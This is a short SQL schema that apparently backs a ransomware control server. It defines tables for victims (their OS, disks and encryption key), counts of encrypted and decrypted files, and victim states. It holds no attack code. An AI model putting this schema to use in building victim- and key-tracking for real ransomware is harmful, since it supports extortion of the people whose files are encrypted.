CREATE TABLE VICTIMS
(
    ID_VICTIM INTEGER NOT NULL CONSTRAINT VICTIMS_PK PRIMARY KEY AUTOINCREMENT,
    OS VARCHAR,
    HASH VARCHAR NOT NULL,
    DISKS VARCHAR,
    KEY VARCHAR NOT NULL
);

CREATE TABLE DECRYPTED
(
    ID_DECRYPTED INTEGER NOT NULL CONSTRAINT DECRYPTED_PK PRIMARY KEY AUTOINCREMENT,
    ID_VICTIM INTEGER NOT NULL CONSTRAINT DECRYPTED_VICTIMS_ID_VICTIM_FK REFERENCES VICTIMS ON UPDATE CASCADE ON DELETE CASCADE,
    DATETIME TIMESTAMP,
    NB_FILES INTEGER NOT NULL
);

CREATE TABLE ENCRYPTED
(
    ID_ENCRYPTED INTEGER NOT NULL CONSTRAINT ENCRYPTED_PK PRIMARY KEY AUTOINCREMENT,
    ID_VICTIM INTEGER NOT NULL CONSTRAINT ENCRYPTED_VICTIMS_ID_VICTIM_FK REFERENCES VICTIMS ON UPDATE CASCADE ON DELETE CASCADE,
    DATETIME TIMESTAMP,
    NB_FILES INTEGER NOT NULL
);

CREATE TABLE STATES
(
    ID_STATE INTEGER NOT NULL CONSTRAINT STATES_PK PRIMARY KEY AUTOINCREMENT,
    ID_VICTIM INTEGER NOT NULL CONSTRAINT STATES_VICTIMS_ID_VICTIM_FK REFERENCES VICTIMS ON UPDATE CASCADE ON DELETE CASCADE,
    DATETIME TIMESTAMP ,
    STATE VARCHAR NOT NULL
);
